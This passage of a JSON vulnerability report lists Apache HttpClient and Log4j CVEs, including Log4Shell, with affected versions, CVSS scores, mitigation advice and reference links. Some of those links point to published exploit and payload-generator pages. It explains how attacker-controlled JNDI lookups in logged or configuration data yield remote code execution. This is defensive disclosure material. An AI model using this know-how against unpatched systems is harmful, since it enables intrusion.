execution."}],"product_status":{"known_affected":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"],"known_not_affected":["org.apache.httpcomponents/httpclient@4.5.13"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r03bbc318c81be21f5c8a9b85e34f2ecc741aa804a8e43b0ef2c37749@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r043a75acdeb52b15dd5e9524cdadef4202e6a5228644206acf9363f9@%3Cdev.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r06cf3ca5c8ceb94b39cd24a73d4e96153b485a7dac88444dd876accb@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0a75b8f0f72f3e18442dc56d33f3827b905f2fe5b7ba48997436f5d1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r0bebe6f9808ac7bdf572873b4fa96a29c6398c90dab29f131f3ebffe@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r12cb62751b35bdcda0ae2a08b67877d665a1f4d41eee0fa7367169e0@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r132e4c6a560cfc519caa1aaee63bdd4036327610eadbd89f76dd5457@%3Cdev.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2835543ef0f91adcc47da72389b816e36936f584c7be584d2314fac3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2a03dc210231d7e852ef73015f71792ac0fcaca6cccc024c522ef17d@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r2dc7930b43eadc78220d269b79e13ecd387e4bee52db67b2f47d4303@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34178ab6ef106bc940665fd3f4ba5026fac3603b3fa2aefafa0b619d@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r34efec51cb817397ccf9f86e25a75676d435ba5f83ee7b2eabdad707@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3cecd59fba74404cbf4eb430135e1080897fb376f111406a78bed13a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r3f740e4c38bba1face49078aa5cbeeb558c27be601cc9712ad2dcd1e@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r4850b3fbaea02fde2886e461005e4af8d37c80a48b3ce2a6edca0e30@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r549ac8c159bf0c568c19670bedeb8d7c0074beded951d34b1c1d0d05@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r55b2a1d1e9b1ec9db792b93da8f0f99a4fd5a5310b02673359d9b4d1@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5b55f65c123a7481104d663a915ec45a0d103e6aaa03f42ed1c07a89@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5de3d3808e7b5028df966e45115e006456c4e8931dc1e29036f17927@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r5fec9c1d67f928179adf484b01e7becd7c0a6fdfe3a08f92ea743b90@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r63296c45d5d84447babaf39bd1487329d8a80d8d563e67a4b6f3d8a7@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r69a94e2f302d1b778bdfefe90fcb4b8c50b226438c3c8c1d0de85a19@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6a3cda38d050ebe13c1bc9a28d0a8ec38945095d07eca49046bcb89f@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6d672b46622842e565e00f6ef6bef83eb55d8792aac2bee75bff9a2a@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6dab7da30f8bf075f79ee189e33b45a197502e2676481bb8787fc0d7%40%3Cdev.hc.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r6eb2dae157dbc9af1f30d1f64e9c60d4ebef618f3dce4a0e32d6ea4d@%3Ccommits.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r70c429923100c5a4fae8e5bc71c8a2d39af3de4888f50a0ac3755e6f@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r87ddc09295c27f25471269ad0a79433a91224045988b88f0413a97ec@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r8aa1e5c343b89aec5b69961471950e862f15246cb6392910161c389b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9e52a6c72c8365000ecd035e48cc9fee5a677a150350d4420c46443d@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra539f20ef0fb0c27ee39945b5f56bf162e5c13d1c60f7344dab8de3b@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ra8bc6b61c5df301a6fe5a716315528ecd17ccb8a7f907e24a47a1a5e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rad6222134183046f3928f733bf680919e0c390739bfbfe6c90049673@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rae14ae25ff4a60251e3ba2629c082c5ba3851dfd4d21218b99b56652@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb33212dab7beccaf1ffef9b88610047c644f644c7a0ebdc44d77e381@%3Ccommits.turbine.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb4ba262d6f08ab9cf8b1ebbcd9b00b0368ffe90dad7ad7918b4b56fc@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb725052404fabffbe093c83b2c46f3f87e12c3193a82379afbc529f8@%3Csolr-user.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc0863892ccfd9fd0d0ae10091f24ee769fb39b8957fe4ebabfc11f17@%3Cdev.jackrabbit.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc3739e0ad4bcf1888c6925233bfc37dd71156bbc8416604833095c42@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc505fee574fe8d18f9b0c655a4d120b0ae21bb6a73b96003e1d9be35@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc5c6ccb86d2afe46bbd4b71573f0448dc1f87bbcd5a0d8c7f8f904b2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rc990e2462ec32b09523deafb2c73606208599e196fa2d7f50bdbc587@%3Cissues.maven.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcced7ed3237c29cd19c1e9bf465d0038b8b2e967b99fc283db7ca553@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rcd9ad5dda60c82ab0d0c9bd3e9cb1dc740804451fc20c7f451ef5cc4@%3Cgitbox.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd0e44e8ef71eeaaa3cf3d1b8b41eb25894372e2995ec908ce7624d26@%3Ccommits.pulsar.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5ab56beb2ac6879f6ab427bc4e5f7691aed8362d17b713f61779858@%3Cissues.hive.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re504acd4d63b8df2a7353658f45c9a3137e5f80e41cf7de50058b2c1@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rea3dbf633dde5008d38bf6600a3738b9216e733e03f9ff7becf79625@%3Cissues.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/ree942561f4620313c75982a4e5f3b74fe6f7062b073210779648eec2@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/reef569c2419705754a3acf42b5f19b2a158153cef0e448158bc54917@%3Cdev.drill.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf03228972e56cb4a03e6d9558188c2938078cf3ceb23a3fead87c9ca@%3Cissues.bookkeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf43d17ed0d1fb4fb79036b582810ef60b18b1ef3add0d5dea825af1e@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf4db88c22e1be9eb60c7dc623d0528642c045fb196a24774ac2fa3a3@%3Cissues.lucene.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf7ca60f78f05b772cc07d27e31bcd112f9910a05caf9095e38ee150f@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfb35f6db9ba1f1e061b63769a4eff5abadcc254ebfefc280e5a0dcf1@%3Ccommits.creadur.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfbedcb586a1e7dfce87ee03c720e583fc2ceeafa05f35c542cecc624@%3Cissues.solr.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc00884c7b7ca878297bffe45fcb742c362b00b26ba37070706d44c3@%3Cissues.hive.apache.org%3E"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-13956"},{"summary":"NetApp Advisory ntap-20220210-0002","url":"https://security.netapp.com/advisory/ntap-20220210-0002"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"NONE","baseScore":5.3,"baseSeverity":"MEDIUM","confidentialityImpact":"NONE","environmentalScore":5.3,"environmentalSeverity":"MEDIUM","integrityImpact":"LOW","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"NONE","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"LOW","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":5.3,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N","version":"3.1"},"products":["org.apache.httpcomponents/httpclient@vers:maven/>=4.0-alpha1|<=4.5.12"]}],"title":"CVE-2020-13956/pkg:maven/org.apache.httpcomponents/httpclient@4.5.12?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-45046"]}],"cve":"CVE-2021-45046","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-14T18:01:28","ids":[{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-45046"},{"system_name":"GitHub Advisory","text":"GHSA-jfh8-c2jp-5v3q"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5022"},{"system_name":"Gentoo Advisory","text":"glsa-202310-16"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Incomplete fix for Apache Log4j vulnerability"},{"category":"details","details":"Vulnerability Details","text":"# Incomplete fix for Apache Log4j vulnerability # Impact  The fix to address [CVE-2021-44228](https://nvd.nist.gov/vuln/detail/CVE-2021-44228) in Apache Log4j 2.15.0 was incomplete in certain non-default configurations. This could allow attackers with control over Thread Context Map (MDC) input data when the logging configuration uses a non-default Pattern Layout with either a Context Lookup (for example, $${ctx:loginId}) or a Thread Context Map pattern (%X, %mdc, or %MDC) to craft malicious input data using a JNDI Lookup pattern resulting in a remote code execution (RCE) attack.   ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  # Mitigation  Log4j 2.16.0 fixes this issue by removing support for message lookup patterns and disabling JNDI functionality by default. This issue can be mitigated in prior releases (< 2.16.0) by removing the JndiLookup class from the classpath (example: zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class).  Log4j 2.15.0 restricts JNDI LDAP lookups to localhost by default. Note that previous mitigations involving configuration such as to set the system property `log4j2.formatMsgNoLookups` to `true` do NOT mitigate this specific vulnerability."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/15/3"},{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/18/1"},{"summary":"Siemens Advisory ssa-397453","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-397453.pdf"},{"summary":"Siemens Advisory ssa-479842","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-479842.pdf"},{"summary":"Siemens Advisory ssa-661247","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-661247.pdf"},{"summary":"Siemens Advisory ssa-714170","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-714170.pdf"},{"summary":"GitHub Advisory GHSA-jfh8-c2jp-5v3q","url":"https://github.com/advisories/GHSA-jfh8-c2jp-5v3q"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EOKPQGV24RRBBI4TBZUDQMM4MEH7MXCY"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SIG7FZULMNK2XF6FZRU4VWYDQXNMUGAJ"},{"summary":"Apache Advisory security","url":"https://logging.apache.org/log4j/2.x/security.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-45046"},{"summary":"Sonicwall Advisory SNWLID-2021-0032","url":"https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0032"},{"summary":"Gentoo Advisory glsa-202310-16","url":"https://security.gentoo.org/glsa/202310-16"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Cve 2021","url":"https://www.cve.org/CVERecord?id=CVE-2021-44228"},{"summary":"Debian Advisory dsa-5022","url":"https://www.debian.org/security/2021/dsa-5022"},{"summary":"Intel Advisory intel-sa-00646","url":"https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00646.html"},{"summary":"Cert Advisory 930724","url":"https://www.kb.cert.org/vuls/id/930724"},{"summary":"Openwall Mailing List","url":"https://www.openwall.com/lists/oss-security/2021/12/14/4"},{"summary":"Oracle Advisory alert-cve-2021-44228","url":"https://www.oracle.com/security-alerts/alert-cve-2021-44228.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.0,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.1,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"CHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"CHANGED","temporalScore":9.0,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.0-alpha1|<=2.12.1"]}],"title":"CVE-2021-45046/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44832"]}],"cve":"CVE-2021-44832","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2022-01-04T16:14:20","ids":[{"system_name":"CVE Record","text":"CVE-2021-44832"},{"system_name":"Apache Advisory","text":"LOG4J2-3293"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"NetApp Advisory","text":"ntap-20220104-0001"},{"system_name":"Siemens Advisory","text":"ssa-784507"}],"notes":[{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements in Output Used by a Downstream Component","title":"Additional CWE: 74"},{"category":"description","details":"Vulnerability Description","text":"Improper Input Validation and Injection in Apache Log4j2"},{"category":"details","details":"Vulnerability Details","text":"# Improper Input Validation and Injection in Apache Log4j2 Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to an attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.   # Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  This issue does not impact default configurations of Log4j2 and requires an attacker to have control over the Log4j2 configuration, which reduces the likelihood of being exploited."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.4"]},"references":[{"summary":"Openwall Mailing List","url":"http://www.openwall.com/lists/oss-security/2021/12/28/1"},{"summary":"Siemens Advisory ssa-784507","url":"https://cert-portal.siemens.com/productcert/pdf/ssa-784507.pdf"},{"summary":"Apache Advisory LOG4J2-3293","url":"https://issues.apache.org/jira/browse/LOG4J2-3293"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread/s1o5vlo78ypqxnzn6p8zf6t9shtq5143"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/12/msg00036.html"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EVV25FXL4FU5X6X5BSL7RLQ7T6F65MRA"},{"summary":"Fedora Project Mailing List","url":"https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/T57MPJUW3MA6QGWZRTMCHHMMPQNVKGFC"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-44832"},{"summary":"NetApp Advisory ntap-20220104-0001","url":"https://security.netapp.com/advisory/ntap-20220104-0001"},{"summary":"Cisco Advisory cisco-sa-apache-log4j-qRuKNEbd","url":"https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":6.6,"baseSeverity":"MEDIUM","confidentialityImpact":"HIGH","environmentalScore":6.6,"environmentalSeverity":"MEDIUM","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"HIGH","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"HIGH","scope":"UNCHANGED","temporalScore":6.6,"temporalSeverity":"MEDIUM","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.4"]}],"title":"CVE-2021-44832/pkg:maven/org.apache.logging.log4j/log4j-core@2.9.1?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-44228"]}],"cve":"CVE-2021-44228","cwe":{"id":"20","name":"Improper Input Validation"},"discovery_date":"2021-12-10T00:40:56","ids":[{"system_name":"Twitter Advisory","text":"1469345530182455296"},{"system_name":"Cert Advisory","text":"930724"},{"system_name":"CVE Record","text":"CVE-2021-44228"},{"system_name":"GitHub Advisory","text":"GHSA-7rjr-3q55-vv33"},{"system_name":"Apple Advisory","text":"HT213189"},{"system_name":"Apache Advisory","text":"LOG4J2-3198"},{"system_name":"Apache Advisory","text":"LOG4J2-3201"},{"system_name":"Apache Advisory","text":"LOG4J2-3214"},{"system_name":"Apache Advisory","text":"LOG4J2-3221"},{"system_name":"Sonicwall Advisory","text":"SNWLID-2021-0032"},{"system_name":"Oracle Advisory","text":"alert-cve-2021-44228"},{"system_name":"Bentley Advisory","text":"be-2022-0001"},{"system_name":"Apache Advisory","text":"changes-report"},{"system_name":"Cisco Advisory","text":"cisco-sa-apache-log4j-qRuKNEbd"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Debian Advisory","text":"dsa-5020"},{"system_name":"Intel Advisory","text":"intel-sa-00646"},{"system_name":"Apache Advisory","text":"lookups"},{"system_name":"Microsoft Advisory","text":"microsofts-response-to-cve-2021-44228-apache-log4j2"},{"system_name":"Apache Advisory","text":"migration"},{"system_name":"NetApp Advisory","text":"ntap-20211210-0007"},{"system_name":"Apache Advisory","text":"security"},{"system_name":"Siemens Advisory","text":"ssa-397453"},{"system_name":"Siemens Advisory","text":"ssa-479842"},{"system_name":"Siemens Advisory","text":"ssa-661247"},{"system_name":"Siemens Advisory","text":"ssa-714170"}],"notes":[{"audience":"developers","category":"other","text":"Uncontrolled Resource Consumption","title":"Additional CWE: 400"},{"audience":"developers","category":"other","text":"Deserialization of Untrusted Data","title":"Additional CWE: 502"},{"audience":"developers","category":"other","text":"Improper Neutralization of Special Elements used in an Expression Language Statement","title":"Additional CWE: 917"},{"category":"description","details":"Vulnerability Description","text":"Remote code injection in Log4j"},{"category":"details","details":"Vulnerability Details","text":"# Remote code injection in Log4j # Summary  Log4j versions prior to 2.16.0 are subject to a remote code execution vulnerability via the ldap JNDI parser. As per [Apache's Log4j security guide](https://logging.apache.org/log4j/2.x/security.html): Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.16.0, this behavior has been disabled by default.  Log4j version 2.15.0 contained an earlier fix for the vulnerability, but that patch did not disable attacker-controlled JNDI lookups in all situations. For more information, see the `Updated advice for version 2.16.0` section of this advisory.  # Impact  Logging untrusted or user controlled data with a vulnerable version of Log4J may result in Remote Code Execution (RCE) against your application. This includes untrusted data included in logged errors such as exception traces, authentication failures, and other unexpected vectors of user controlled input.   # Affected versions  Any Log4J version prior to v2.15.0 is affected to this specific issue.  The v1 branch of Log4J which is considered End Of Life (EOL) is vulnerable to other RCE vectors so the recommendation is to still update to 2.16.0 where possible.  ## Security releases Additional backports of this fix have been made available in versions 2.3.1, 2.12.2, and 2.12.3  ## Affected packages Only the `org.apache.logging.log4j:log4j-core` package is directly affected by this vulnerability. The `org.apache.logging.log4j:log4j-api` should be kept at the same version as the `org.apache.logging.log4j:log4j-core` package to ensure compatability if in use.  # Remediation Advice  ## Updated advice for version 2.16.0  The Apache Logging Services team provided updated mitigation advice upon the release of version 2.16.0, which [disables JNDI by default and completely removes support for message lookups](https://logging.apache.org/log4j/2.x/changes-report.html#a2.16.0). Even in version 2.15.0, lookups used in layouts to provide specific pieces of context information will still recursively resolve, possibly triggering JNDI lookups. This problem is being tracked as [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046). More information is available on the [GitHub Security Advisory for CVE-2021-45046](https://github.com/advisories/GHSA-7rjr-3q55-vv33).  Users who want to avoid attacker-controlled JNDI lookups but cannot upgrade to 2.16.0 must [ensure that no such lookups resolve to attacker-provided data and ensure that the the JndiLookup class is not loaded](https://issues.apache.org/jira/browse/LOG4J2-3221).  Please note that Log4J v1 is End Of Life (EOL) and will not receive patches for this issue. Log4J v1 is also vulnerable to other RCE vectors and we recommend you migrate to Log4J 2.16.0 where possible."}],"product_status":{"known_affected":["org.apache.logging.log4j/log4j-core@vers:maven/>=2.4|<2.12.2"],"known_not_affected":["org.apache.logging.log4j/log4j-core@2.12.2"]},"references":[{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165225/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165260/VMware-Security-Advisory-2021-0028.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165261/Apache-Log4j2-2.14.1-Information-Disclosure.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165270/Apache-Log4j2-2.14.1-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165281/Log4j2-Log4Shell-Regexes.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165282/Log4j-Payload-Generator.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165306/L4sh-Log4j-Remote-Code-Execution.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165307/Log4j-Remote-Code-Execution-Word-Bypassing.html"},{"summary":"Packetstormsecurity Exploit","url":"http://packetstormsecurity.com/files/165311/log4j-scan-Extensive-Scanner.html"},{"summary":"Packetstormsecurity 